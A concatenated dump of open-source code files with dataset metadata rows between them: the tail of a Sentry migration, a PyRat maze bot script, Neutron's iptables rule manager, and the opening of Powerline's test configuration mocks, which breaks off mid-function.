'ident': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'num_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry']
| bsd-3-clause | 6,954,336,949,804,500,000 | 81.926056 | 181 | 0.556367 | false |
dimtion/jml | outputFiles/statistics/archives/ourIA/improved_closest_v2.py/1.0/9/player1.py | 1 | 11276 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
####################################################################################################################################################################################################################################
######################################################################################################## PRE-DEFINED IMPORTS #######################################################################################################
####################################################################################################################################################################################################################################
# Imports that are necessary for the program architecture to work properly
# Do not edit this code
import ast
import sys
import os
####################################################################################################################################################################################################################################
####################################################################################################### PRE-DEFINED CONSTANTS ######################################################################################################
####################################################################################################################################################################################################################################
# Possible characters to send to the maze application
# Any other will be ignored
# Do not edit this code
UP = 'U'
DOWN = 'D'
LEFT = 'L'
RIGHT = 'R'
####################################################################################################################################################################################################################################
# Name of your team
# It will be displayed in the maze
# You have to edit this code
TEAM_NAME = "Improved closest v2"
####################################################################################################################################################################################################################################
########################################################################################################## YOUR VARIABLES ##########################################################################################################
####################################################################################################################################################################################################################################
# Stores all the moves in a list to replay them one by one
allMoves = [RIGHT, RIGHT, RIGHT, RIGHT, UP, UP, LEFT, UP, RIGHT, RIGHT, UP, RIGHT, UP, UP, UP, RIGHT, DOWN, RIGHT, UP, UP]
####################################################################################################################################################################################################################################
####################################################################################################### PRE-DEFINED FUNCTIONS ######################################################################################################
####################################################################################################################################################################################################################################
# Writes a message to the shell
# Use for debugging your program
# Channels stdout and stdin are captured to enable communication with the maze
# Do not edit this code
def debug (text) :
# Writes to the stderr channel
sys.stderr.write(str(text) + "\n")
sys.stderr.flush()
####################################################################################################################################################################################################################################
# Reads one line of information sent by the maze application
# This function is blocking, and will wait for a line to terminate
# The received information is automatically converted to the correct type
# Do not edit this code
def readFromPipe () :
# Reads from the stdin channel and returns the structure associated to the string
try :
text = sys.stdin.readline()
return ast.literal_eval(text.strip())
except :
os._exit(-1)
####################################################################################################################################################################################################################################
# Sends the text to the maze application
# Do not edit this code
def writeToPipe (text) :
# Writes to the stdout channel
sys.stdout.write(text)
sys.stdout.flush()
####################################################################################################################################################################################################################################
# Reads the initial maze information
# The function processes the text and returns the associated variables
# The dimensions of the maze are positive integers
# Maze map is a dictionary associating to a location its adjacent locations and the associated weights
# The preparation time gives the time during which 'initializationCode' can make computations before the game starts
# The turn time gives the time during which 'determineNextMove' can make computations before returning a decision
# Player locations are tuples (line, column)
# Coins are given as a list of locations where they appear
# A boolean indicates if the game is over
# Do not edit this code
def processInitialInformation () :
# We read from the pipe
data = readFromPipe()
return (data['mazeWidth'], data['mazeHeight'], data['mazeMap'], data['preparationTime'], data['turnTime'], data['playerLocation'], data['opponentLocation'], data['coins'], data['gameIsOver'])
####################################################################################################################################################################################################################################
# Reads the information after each player moved
# The maze map and allowed times are no longer provided since they do not change
# Do not edit this code
def processNextInformation () :
# We read from the pipe
data = readFromPipe()
return (data['playerLocation'], data['opponentLocation'], data['coins'], data['gameIsOver'])
####################################################################################################################################################################################################################################
########################################################################################################## YOUR FUNCTIONS ##########################################################################################################
####################################################################################################################################################################################################################################
# This is where you should write your code to do things during the initialization delay
# This function should not return anything, but should be used for a short preprocessing
# This function takes as parameters the dimensions and map of the maze, the time it is allowed for computing, the players locations in the maze and the remaining coins locations
# Make sure to have a safety margin for the time to include processing times (communication etc.)
def initializationCode (mazeWidth, mazeHeight, mazeMap, timeAllowed, playerLocation, opponentLocation, coins) :
# Nothing to do
pass
####################################################################################################################################################################################################################################
# This is where you should write your code to determine the next direction
# This function should return one of the directions defined in the CONSTANTS section
# This function takes as parameters the dimensions and map of the maze, the time it is allowed for computing, the players locations in the maze and the remaining coins locations
# Make sure to have a safety margin for the time to include processing times (communication etc.)
def determineNextMove (mazeWidth, mazeHeight, mazeMap, timeAllowed, playerLocation, opponentLocation, coins) :
# We return the next move as described by the list
global allMoves
nextMove = allMoves[0]
allMoves = allMoves[1:]
return nextMove
####################################################################################################################################################################################################################################
############################################################################################################# MAIN LOOP ############################################################################################################
####################################################################################################################################################################################################################################
# This is the entry point when executing this file
# We first send the name of the team to the maze
# The first message we receive from the maze includes its dimensions and map, the times allowed to the various steps, and the players and coins locations
# Then, at every loop iteration, we get the maze status and determine a move
# Do not edit this code
if __name__ == "__main__" :
# We send the team name
writeToPipe(TEAM_NAME + "\n")
# We process the initial information and have a delay to compute things using it
(mazeWidth, mazeHeight, mazeMap, preparationTime, turnTime, playerLocation, opponentLocation, coins, gameIsOver) = processInitialInformation()
initializationCode(mazeWidth, mazeHeight, mazeMap, preparationTime, playerLocation, opponentLocation, coins)
# We decide how to move and wait for the next step
while not gameIsOver :
(playerLocation, opponentLocation, coins, gameIsOver) = processNextInformation()
if gameIsOver :
break
nextMove = determineNextMove(mazeWidth, mazeHeight, mazeMap, turnTime, playerLocation, opponentLocation, coins)
writeToPipe(nextMove)
####################################################################################################################################################################################################################################
#################################################################################################################################################################################################################################### | mit | 2,706,744,758,109,684,000 | 64.184971 | 228 | 0.357751 | false |
swdream/neutron | neutron/agent/linux/iptables_manager.py | 17 | 28571 | # Copyright 2012 Locaweb.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# based on
# https://github.com/openstack/nova/blob/master/nova/network/linux_net.py
"""Implements iptables rules using linux utilities."""
import collections
import contextlib
import os
import re
import sys
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import six
from neutron.agent.common import config
from neutron.agent.linux import iptables_comments as ic
from neutron.agent.linux import utils as linux_utils
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron.i18n import _LE, _LW
LOG = logging.getLogger(__name__)
config.register_iptables_opts(cfg.CONF)
# NOTE(vish): Iptables supports chain names of up to 28 characters, and we
# add up to 12 characters to binary_name which is used as a prefix,
# so we limit it to 16 characters.
# (max_chain_name_length - len('-POSTROUTING') == 16)
def get_binary_name():
"""Grab the name of the binary we're running in."""
return os.path.basename(sys.argv[0])[:16].replace(' ', '_')
binary_name = get_binary_name()
# The length of a chain name must be less than or equal to 11 characters.
# <max length of iptables chain name> - (<binary_name> + '-') = 28-(16+1) = 11
MAX_CHAIN_LEN_WRAP = 11
MAX_CHAIN_LEN_NOWRAP = 28
# Number of iptables rules to print before and after a rule that causes
# a failure during iptables-restore
IPTABLES_ERROR_LINES_OF_CONTEXT = 5
def comment_rule(rule, comment):
if not cfg.CONF.AGENT.comment_iptables_rules or not comment:
return rule
# iptables-save outputs the comment before the jump so we need to match
# that order so _find_last_entry works
try:
start_of_jump = rule.index(' -j ')
except ValueError:
return '%s -m comment --comment "%s"' % (rule, comment)
return ' '.join([rule[0:start_of_jump],
'-m comment --comment "%s"' % comment,
rule[start_of_jump + 1:]])
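# Illustrative example (hypothetical rule text, not taken from a real run):
# assuming the AGENT.comment_iptables_rules option is enabled,
#     comment_rule('-A INPUT -j ACCEPT', 'allow all')
# returns '-A INPUT -m comment --comment "allow all" -j ACCEPT', keeping the
# comment match ahead of the jump so it lines up with iptables-save output.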
def get_chain_name(chain_name, wrap=True):
if wrap:
return chain_name[:MAX_CHAIN_LEN_WRAP]
else:
return chain_name[:MAX_CHAIN_LEN_NOWRAP]
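# Illustrative example (hypothetical name, not taken from this module):
#     get_chain_name('a-very-long-chain-name')              -> 'a-very-long'
#     get_chain_name('a-very-long-chain-name', wrap=False)  -> unchanged
# Wrapped names are clipped to 11 characters so that the full
# '<binary name>-<chain>' string stays within the 28 character iptables limit.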
class IptablesRule(object):
"""An iptables rule.
You shouldn't need to use this class directly, it's only used by
IptablesManager.
"""
def __init__(self, chain, rule, wrap=True, top=False,
binary_name=binary_name, tag=None, comment=None):
self.chain = get_chain_name(chain, wrap)
self.rule = rule
self.wrap = wrap
self.top = top
self.wrap_name = binary_name[:16]
self.tag = tag
self.comment = comment
def __eq__(self, other):
return ((self.chain == other.chain) and
(self.rule == other.rule) and
(self.top == other.top) and
(self.wrap == other.wrap))
def __ne__(self, other):
return not self == other
def __str__(self):
if self.wrap:
chain = '%s-%s' % (self.wrap_name, self.chain)
else:
chain = self.chain
return comment_rule('-A %s %s' % (chain, self.rule), self.comment)
class IptablesTable(object):
"""An iptables table."""
def __init__(self, binary_name=binary_name):
self.rules = []
self.remove_rules = []
self.chains = set()
self.unwrapped_chains = set()
self.remove_chains = set()
self.wrap_name = binary_name[:16]
def add_chain(self, name, wrap=True):
"""Adds a named chain to the table.
The chain name is wrapped to be unique for the component creating
it, so different components of Nova can safely create identically
named chains without interfering with one another.
At the moment, its wrapped name is <binary name>-<chain name>,
so if neutron-openvswitch-agent creates a chain named 'OUTPUT',
it'll actually end up being named 'neutron-openvswi-OUTPUT'.
"""
name = get_chain_name(name, wrap)
if wrap:
self.chains.add(name)
else:
self.unwrapped_chains.add(name)
def _select_chain_set(self, wrap):
if wrap:
return self.chains
else:
return self.unwrapped_chains
def remove_chain(self, name, wrap=True):
"""Remove named chain.
        This removal "cascades". All rules in the chain are removed, as are
all rules in other chains that jump to it.
If the chain is not found, this is merely logged.
"""
name = get_chain_name(name, wrap)
chain_set = self._select_chain_set(wrap)
if name not in chain_set:
LOG.debug('Attempted to remove chain %s which does not exist',
name)
return
chain_set.remove(name)
if not wrap:
# non-wrapped chains and rules need to be dealt with specially,
# so we keep a list of them to be iterated over in apply()
self.remove_chains.add(name)
# first, add rules to remove that have a matching chain name
self.remove_rules += [r for r in self.rules if r.chain == name]
# next, remove rules from list that have a matching chain name
self.rules = [r for r in self.rules if r.chain != name]
if not wrap:
jump_snippet = '-j %s' % name
# next, add rules to remove that have a matching jump chain
self.remove_rules += [r for r in self.rules
if jump_snippet in r.rule]
else:
jump_snippet = '-j %s-%s' % (self.wrap_name, name)
# finally, remove rules from list that have a matching jump chain
self.rules = [r for r in self.rules
if jump_snippet not in r.rule]
def add_rule(self, chain, rule, wrap=True, top=False, tag=None,
comment=None):
"""Add a rule to the table.
This is just like what you'd feed to iptables, just without
the '-A <chain name>' bit at the start.
However, if you need to jump to one of your wrapped chains,
prepend its name with a '$' which will ensure the wrapping
is applied correctly.
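        For illustration only (hypothetical names, not used elsewhere in
        this module): assuming 'INPUT' and 'sg-chain' were both added with
        add_chain(), a call such as add_rule('INPUT', '-j $sg-chain')
        renders the jump target as '<binary name>-sg-chain'.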
"""
chain = get_chain_name(chain, wrap)
if wrap and chain not in self.chains:
raise LookupError(_('Unknown chain: %r') % chain)
if '$' in rule:
rule = ' '.join(
self._wrap_target_chain(e, wrap) for e in rule.split(' '))
self.rules.append(IptablesRule(chain, rule, wrap, top, self.wrap_name,
tag, comment))
def _wrap_target_chain(self, s, wrap):
if s.startswith('$'):
s = ('%s-%s' % (self.wrap_name, get_chain_name(s[1:], wrap)))
return s
def remove_rule(self, chain, rule, wrap=True, top=False, comment=None):
"""Remove a rule from a chain.
Note: The rule must be exactly identical to the one that was added.
You cannot switch arguments around like you can with the iptables
CLI tool.
"""
chain = get_chain_name(chain, wrap)
try:
if '$' in rule:
rule = ' '.join(
self._wrap_target_chain(e, wrap) for e in rule.split(' '))
self.rules.remove(IptablesRule(chain, rule, wrap, top,
self.wrap_name,
comment=comment))
if not wrap:
self.remove_rules.append(IptablesRule(chain, rule, wrap, top,
self.wrap_name,
comment=comment))
except ValueError:
LOG.warn(_LW('Tried to remove rule that was not there:'
' %(chain)r %(rule)r %(wrap)r %(top)r'),
{'chain': chain, 'rule': rule,
'top': top, 'wrap': wrap})
def _get_chain_rules(self, chain, wrap):
chain = get_chain_name(chain, wrap)
return [rule for rule in self.rules
if rule.chain == chain and rule.wrap == wrap]
def empty_chain(self, chain, wrap=True):
"""Remove all rules from a chain."""
chained_rules = self._get_chain_rules(chain, wrap)
for rule in chained_rules:
self.rules.remove(rule)
def clear_rules_by_tag(self, tag):
if not tag:
return
rules = [rule for rule in self.rules if rule.tag == tag]
for rule in rules:
self.rules.remove(rule)
class IptablesManager(object):
"""Wrapper for iptables.
See IptablesTable for some usage docs
A number of chains are set up to begin with.
First, neutron-filter-top. It's added at the top of FORWARD and OUTPUT.
Its name is not wrapped, so it's shared between the various neutron
workers. It's intended for rules that need to live at the top of the
FORWARD and OUTPUT chains. It's in both the ipv4 and ipv6 set of tables.
For ipv4 and ipv6, the built-in INPUT, OUTPUT, and FORWARD filter chains
are wrapped, meaning that the "real" INPUT chain has a rule that jumps to
the wrapped INPUT chain, etc. Additionally, there's a wrapped chain named
"local" which is jumped to from neutron-filter-top.
For ipv4, the built-in PREROUTING, OUTPUT, and POSTROUTING nat chains are
    wrapped in the same way as the built-in filter chains. Additionally,
there's a snat chain that is applied after the POSTROUTING chain.
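    A minimal usage sketch (hypothetical chain name, and assuming the
    process is permitted to run iptables) would be:
        manager = IptablesManager(use_ipv6=False)
        manager.ipv4['filter'].add_chain('example')
        manager.ipv4['filter'].add_rule('example', '-j ACCEPT')
        manager.apply()
    where apply() rewrites the kernel tables atomically via iptables-restore.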
"""
def __init__(self, _execute=None, state_less=False, use_ipv6=False,
namespace=None, binary_name=binary_name):
if _execute:
self.execute = _execute
else:
self.execute = linux_utils.execute
self.use_ipv6 = use_ipv6
self.namespace = namespace
self.iptables_apply_deferred = False
self.wrap_name = binary_name[:16]
self.ipv4 = {'filter': IptablesTable(binary_name=self.wrap_name)}
self.ipv6 = {'filter': IptablesTable(binary_name=self.wrap_name)}
# Add a neutron-filter-top chain. It's intended to be shared
# among the various neutron components. It sits at the very top
# of FORWARD and OUTPUT.
for tables in [self.ipv4, self.ipv6]:
tables['filter'].add_chain('neutron-filter-top', wrap=False)
tables['filter'].add_rule('FORWARD', '-j neutron-filter-top',
wrap=False, top=True)
tables['filter'].add_rule('OUTPUT', '-j neutron-filter-top',
wrap=False, top=True)
tables['filter'].add_chain('local')
tables['filter'].add_rule('neutron-filter-top', '-j $local',
wrap=False)
# Wrap the built-in chains
builtin_chains = {4: {'filter': ['INPUT', 'OUTPUT', 'FORWARD']},
6: {'filter': ['INPUT', 'OUTPUT', 'FORWARD']}}
if not state_less:
self.ipv4.update(
{'mangle': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[4].update(
{'mangle': ['PREROUTING', 'INPUT', 'FORWARD', 'OUTPUT',
'POSTROUTING']})
self.ipv4.update(
{'nat': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[4].update({'nat': ['PREROUTING',
'OUTPUT', 'POSTROUTING']})
self.ipv4.update({'raw': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[4].update({'raw': ['PREROUTING', 'OUTPUT']})
self.ipv6.update({'raw': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[6].update({'raw': ['PREROUTING', 'OUTPUT']})
for ip_version in builtin_chains:
if ip_version == 4:
tables = self.ipv4
elif ip_version == 6:
tables = self.ipv6
for table, chains in six.iteritems(builtin_chains[ip_version]):
for chain in chains:
tables[table].add_chain(chain)
tables[table].add_rule(chain, '-j $%s' %
(chain), wrap=False)
if not state_less:
# Add a neutron-postrouting-bottom chain. It's intended to be
# shared among the various neutron components. We set it as the
# last chain of POSTROUTING chain.
self.ipv4['nat'].add_chain('neutron-postrouting-bottom',
wrap=False)
self.ipv4['nat'].add_rule('POSTROUTING',
'-j neutron-postrouting-bottom',
wrap=False)
# We add a snat chain to the shared neutron-postrouting-bottom
# chain so that it's applied last.
self.ipv4['nat'].add_chain('snat')
self.ipv4['nat'].add_rule('neutron-postrouting-bottom',
'-j $snat', wrap=False,
comment=ic.SNAT_OUT)
# And then we add a float-snat chain and jump to first thing in
# the snat chain.
self.ipv4['nat'].add_chain('float-snat')
self.ipv4['nat'].add_rule('snat', '-j $float-snat')
# Add a mark chain to mangle PREROUTING chain. It is used to
# identify ingress packets from a certain interface.
self.ipv4['mangle'].add_chain('mark')
self.ipv4['mangle'].add_rule('PREROUTING', '-j $mark')
def get_chain(self, table, chain, ip_version=4, wrap=True):
try:
requested_table = {4: self.ipv4, 6: self.ipv6}[ip_version][table]
except KeyError:
return []
return requested_table._get_chain_rules(chain, wrap)
def is_chain_empty(self, table, chain, ip_version=4, wrap=True):
return not self.get_chain(table, chain, ip_version, wrap)
@contextlib.contextmanager
def defer_apply(self):
"""Defer apply context."""
self.defer_apply_on()
try:
yield
finally:
try:
self.defer_apply_off()
except Exception:
msg = _LE('Failure applying iptables rules')
LOG.exception(msg)
raise n_exc.IpTablesApplyException(msg)
def defer_apply_on(self):
self.iptables_apply_deferred = True
def defer_apply_off(self):
self.iptables_apply_deferred = False
self._apply()
def apply(self):
if self.iptables_apply_deferred:
return
self._apply()
def _apply(self):
lock_name = 'iptables'
if self.namespace:
lock_name += '-' + self.namespace
with lockutils.lock(lock_name, utils.SYNCHRONIZED_PREFIX, True):
return self._apply_synchronized()
def get_rules_for_table(self, table):
"""Runs iptables-save on a table and returns the results."""
args = ['iptables-save', '-t', table]
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
return self.execute(args, run_as_root=True).split('\n')
def _apply_synchronized(self):
"""Apply the current in-memory set of iptables rules.
This will blow away any rules left over from previous runs of the
same component of Nova, and replace them with our current set of
rules. This happens atomically, thanks to iptables-restore.
"""
s = [('iptables', self.ipv4)]
if self.use_ipv6:
s += [('ip6tables', self.ipv6)]
for cmd, tables in s:
args = ['%s-save' % (cmd,), '-c']
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
all_tables = self.execute(args, run_as_root=True)
all_lines = all_tables.split('\n')
# Traverse tables in sorted order for predictable dump output
for table_name in sorted(tables):
table = tables[table_name]
start, end = self._find_table(all_lines, table_name)
all_lines[start:end] = self._modify_rules(
all_lines[start:end], table, table_name)
args = ['%s-restore' % (cmd,), '-c']
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
try:
self.execute(args, process_input='\n'.join(all_lines),
run_as_root=True)
except RuntimeError as r_error:
with excutils.save_and_reraise_exception():
try:
line_no = int(re.search(
'iptables-restore: line ([0-9]+?) failed',
str(r_error)).group(1))
context = IPTABLES_ERROR_LINES_OF_CONTEXT
log_start = max(0, line_no - context)
log_end = line_no + context
except AttributeError:
# line error wasn't found, print all lines instead
log_start = 0
log_end = len(all_lines)
log_lines = ('%7d. %s' % (idx, l)
for idx, l in enumerate(
all_lines[log_start:log_end],
log_start + 1)
)
LOG.error(_LE("IPTablesManager.apply failed to apply the "
"following set of iptables rules:\n%s"),
'\n'.join(log_lines))
LOG.debug("IPTablesManager.apply completed with success")
def _find_table(self, lines, table_name):
if len(lines) < 3:
# length only <2 when fake iptables
return (0, 0)
try:
start = lines.index('*%s' % table_name) - 1
except ValueError:
# Couldn't find table_name
LOG.debug('Unable to find table %s', table_name)
return (0, 0)
end = lines[start:].index('COMMIT') + start + 2
return (start, end)
def _find_rules_index(self, lines):
seen_chains = False
rules_index = 0
for rules_index, rule in enumerate(lines):
if not seen_chains:
if rule.startswith(':'):
seen_chains = True
else:
if not rule.startswith(':'):
break
if not seen_chains:
rules_index = 2
return rules_index
def _find_last_entry(self, filter_map, match_str):
# find last matching entry
try:
return filter_map[match_str][-1]
except KeyError:
pass
def _modify_rules(self, current_lines, table, table_name):
# Chains are stored as sets to avoid duplicates.
# Sort the output chains here to make their order predictable.
unwrapped_chains = sorted(table.unwrapped_chains)
chains = sorted(table.chains)
remove_chains = table.remove_chains
rules = table.rules
remove_rules = table.remove_rules
if not current_lines:
fake_table = ['# Generated by iptables_manager',
'*' + table_name, 'COMMIT',
'# Completed by iptables_manager']
current_lines = fake_table
        # Fill old_filter with any chains or rules we might have added,
        # since they could have a [packet:byte] count we want to preserve.
# Fill new_filter with any chains or rules without our name in them.
old_filter, new_filter = [], []
for line in current_lines:
(old_filter if self.wrap_name in line else
new_filter).append(line.strip())
old_filter_map = make_filter_map(old_filter)
new_filter_map = make_filter_map(new_filter)
rules_index = self._find_rules_index(new_filter)
all_chains = [':%s' % name for name in unwrapped_chains]
all_chains += [':%s-%s' % (self.wrap_name, name) for name in chains]
# Iterate through all the chains, trying to find an existing
# match.
our_chains = []
for chain in all_chains:
chain_str = str(chain).strip()
old = self._find_last_entry(old_filter_map, chain_str)
if not old:
dup = self._find_last_entry(new_filter_map, chain_str)
new_filter = [s for s in new_filter if chain_str not in s.strip()]
# if no old or duplicates, use original chain
if old or dup:
chain_str = str(old or dup)
else:
# add-on the [packet:bytes]
chain_str += ' - [0:0]'
our_chains += [chain_str]
# Iterate through all the rules, trying to find an existing
# match.
our_rules = []
bot_rules = []
for rule in rules:
rule_str = str(rule).strip()
# Further down, we weed out duplicates from the bottom of the
# list, so here we remove the dupes ahead of time.
old = self._find_last_entry(old_filter_map, rule_str)
if not old:
dup = self._find_last_entry(new_filter_map, rule_str)
new_filter = [s for s in new_filter if rule_str not in s.strip()]
# if no old or duplicates, use original rule
if old or dup:
rule_str = str(old or dup)
# backup one index so we write the array correctly
if not old:
rules_index -= 1
else:
# add-on the [packet:bytes]
rule_str = '[0:0] ' + rule_str
if rule.top:
# rule.top == True means we want this rule to be at the top.
our_rules += [rule_str]
else:
bot_rules += [rule_str]
our_rules += bot_rules
new_filter[rules_index:rules_index] = our_rules
new_filter[rules_index:rules_index] = our_chains
def _strip_packets_bytes(line):
# strip any [packet:byte] counts at start or end of lines
if line.startswith(':'):
# it's a chain, for example, ":neutron-billing - [0:0]"
line = line.split(':')[1]
line = line.split(' - [', 1)[0]
elif line.startswith('['):
# it's a rule, for example, "[0:0] -A neutron-billing..."
line = line.split('] ', 1)[1]
line = line.strip()
return line
seen_chains = set()
def _weed_out_duplicate_chains(line):
# ignore [packet:byte] counts at end of lines
if line.startswith(':'):
line = _strip_packets_bytes(line)
if line in seen_chains:
return False
else:
seen_chains.add(line)
# Leave it alone
return True
seen_rules = set()
def _weed_out_duplicate_rules(line):
if line.startswith('['):
line = _strip_packets_bytes(line)
if line in seen_rules:
return False
else:
seen_rules.add(line)
# Leave it alone
return True
def _weed_out_removes(line):
# We need to find exact matches here
if line.startswith(':'):
line = _strip_packets_bytes(line)
for chain in remove_chains:
if chain == line:
remove_chains.remove(chain)
return False
elif line.startswith('['):
line = _strip_packets_bytes(line)
for rule in remove_rules:
rule_str = _strip_packets_bytes(str(rule))
if rule_str == line:
remove_rules.remove(rule)
return False
# Leave it alone
return True
# We filter duplicates. Go through the chains and rules, letting
# the *last* occurrence take precedence since it could have a
# non-zero [packet:byte] count we want to preserve. We also filter
# out anything in the "remove" list.
new_filter.reverse()
new_filter = [line for line in new_filter
if _weed_out_duplicate_chains(line) and
_weed_out_duplicate_rules(line) and
_weed_out_removes(line)]
new_filter.reverse()
# flush lists, just in case we didn't find something
remove_chains.clear()
for rule in remove_rules:
remove_rules.remove(rule)
return new_filter
def _get_traffic_counters_cmd_tables(self, chain, wrap=True):
name = get_chain_name(chain, wrap)
cmd_tables = [('iptables', key) for key, table in self.ipv4.items()
if name in table._select_chain_set(wrap)]
if self.use_ipv6:
cmd_tables += [('ip6tables', key)
for key, table in self.ipv6.items()
if name in table._select_chain_set(wrap)]
return cmd_tables
def get_traffic_counters(self, chain, wrap=True, zero=False):
"""Return the sum of the traffic counters of all rules of a chain."""
cmd_tables = self._get_traffic_counters_cmd_tables(chain, wrap)
if not cmd_tables:
LOG.warn(_LW('Attempted to get traffic counters of chain %s which '
'does not exist'), chain)
return
name = get_chain_name(chain, wrap)
acc = {'pkts': 0, 'bytes': 0}
for cmd, table in cmd_tables:
args = [cmd, '-t', table, '-L', name, '-n', '-v', '-x']
if zero:
args.append('-Z')
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
current_table = self.execute(args, run_as_root=True)
current_lines = current_table.split('\n')
for line in current_lines[2:]:
if not line:
break
data = line.split()
if (len(data) < 2 or
not data[0].isdigit() or
not data[1].isdigit()):
break
acc['pkts'] += int(data[0])
acc['bytes'] += int(data[1])
return acc
def make_filter_map(filter_list):
filter_map = collections.defaultdict(list)
for data in filter_list:
# strip any [packet:byte] counts at start or end of lines,
# for example, chains look like ":neutron-foo - [0:0]"
# and rules look like "[0:0] -A neutron-foo..."
if data.startswith('['):
key = data.rpartition('] ')[2]
elif data.endswith(']'):
key = data.rsplit(' [', 1)[0]
if key.endswith(' -'):
key = key[:-2]
else:
# things like COMMIT, *filter, and *nat land here
continue
filter_map[key].append(data)
# regular IP(v6) entries are translated into /32s or /128s so we
# include a lookup without the CIDR here to match as well
for cidr in ('/32', '/128'):
if cidr in key:
alt_key = key.replace(cidr, '')
filter_map[alt_key].append(data)
# return a regular dict so readers don't accidentally add entries
return dict(filter_map)
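# Illustrative example (hypothetical iptables-save line, not from a real run):
# given '[0:0] -A foo -s 10.0.0.1/32 -j ACCEPT', the entry is stored under
# both '-A foo -s 10.0.0.1/32 -j ACCEPT' and '-A foo -s 10.0.0.1 -j ACCEPT',
# so lookups written with or without the host CIDR find the same line.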
| apache-2.0 | 4,434,900,085,659,792,400 | 36.642951 | 79 | 0.543278 | false |
EricSB/powerline | tests/lib/config_mock.py | 3 | 5302 | # vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
from threading import Lock
from copy import deepcopy
from time import sleep
from functools import wraps
from powerline.renderer import Renderer
from powerline.lib.config import ConfigLoader
from powerline import Powerline, get_default_theme
from tests.lib import Args, replace_attr
UT = get_default_theme(is_unicode=True)
AT = get_default_theme(is_unicode=False)
class TestHelpers(object):
def __init__(self, config):
self.config = config
self.access_log = []
self.access_lock = Lock()
def loader_condition(self, path):
return (path in self.config) and path
def find_config_files(self, cfg_path, config_loader, loader_callback):
if cfg_path.endswith('.json'):
cfg_path = cfg_path[:-5]
if cfg_path.startswith('/'):
cfg_path = cfg_path.lstrip('/')
with self.access_lock:
self.access_log.append('check:' + cfg_path)
if cfg_path in self.config:
yield cfg_path
else:
if config_loader:
config_loader.register_missing(self.loader_condition, loader_callback, cfg_path)
raise IOError(('fcf:' if cfg_path.endswith('raise') else '') + cfg_path)
def load_json_config(self, config_file_path, *args, **kwargs):
if config_file_path.endswith('.json'):
config_file_path = config_file_path[:-5]
if config_file_path.startswith('/'):
config_file_path = config_file_path.lstrip('/')
with self.access_lock:
self.access_log.append('load:' + config_file_path)
try:
return deepcopy(self.config[config_file_path])
except KeyError:
raise IOError(config_file_path)
def pop_events(self):
with self.access_lock:
r = self.access_log[:]
self.access_log = []
return r
def log_call(func):
@wraps(func)
def ret(self, *args, **kwargs):
self._calls.append((func.__name__, args, kwargs))
return func(self, *args, **kwargs)
return ret
class TestWatcher(object):
events = set()
lock = Lock()
def __init__(self):
self._calls = []
@log_call
def watch(self, file):
pass
@log_call
def __call__(self, file):
with self.lock:
if file in self.events:
self.events.remove(file)
return True
return False
def _reset(self, files):
with self.lock:
self.events.clear()
self.events.update(files)
@log_call
def unsubscribe(self):
pass
class Logger(object):
def __init__(self):
self.messages = []
self.lock = Lock()
def _add_msg(self, attr, msg):
with self.lock:
self.messages.append(attr + ':' + msg)
def _pop_msgs(self):
with self.lock:
r = self.messages
self.messages = []
return r
def __getattr__(self, attr):
return lambda *args, **kwargs: self._add_msg(attr, *args, **kwargs)
class SimpleRenderer(Renderer):
def hlstyle(self, fg=None, bg=None, attrs=None):
return '<{fg} {bg} {attrs}>'.format(fg=fg and fg[0], bg=bg and bg[0], attrs=attrs)
class EvenSimplerRenderer(Renderer):
def hlstyle(self, fg=None, bg=None, attrs=None):
return '{{{fg}{bg}{attrs}}}'.format(
fg=fg and fg[0] or '-',
bg=bg and bg[0] or '-',
attrs=attrs if attrs else '',
)
class TestPowerline(Powerline):
_created = False
def __init__(self, _helpers, **kwargs):
super(TestPowerline, self).__init__(**kwargs)
self._helpers = _helpers
self.find_config_files = _helpers.find_config_files
@staticmethod
def get_local_themes(local_themes):
return local_themes
@staticmethod
def get_config_paths():
return ['']
def _will_create_renderer(self):
return self.cr_kwargs
def _pop_events(self):
return self._helpers.pop_events()
renderer = EvenSimplerRenderer
class TestConfigLoader(ConfigLoader):
def __init__(self, _helpers, **kwargs):
watcher = TestWatcher()
super(TestConfigLoader, self).__init__(
load=_helpers.load_json_config,
watcher=watcher,
watcher_type='test',
**kwargs
)
def get_powerline(config, **kwargs):
helpers = TestHelpers(config)
return get_powerline_raw(
helpers,
TestPowerline,
_helpers=helpers,
ext='test',
renderer_module='tests.lib.config_mock',
logger=Logger(),
**kwargs
)
def select_renderer(simpler_renderer=False):
global renderer
renderer = EvenSimplerRenderer if simpler_renderer else SimpleRenderer
def get_powerline_raw(helpers, PowerlineClass, replace_gcp=False, **kwargs):
if not isinstance(helpers, TestHelpers):
helpers = TestHelpers(helpers)
select_renderer(kwargs.pop('simpler_renderer', False))
if replace_gcp:
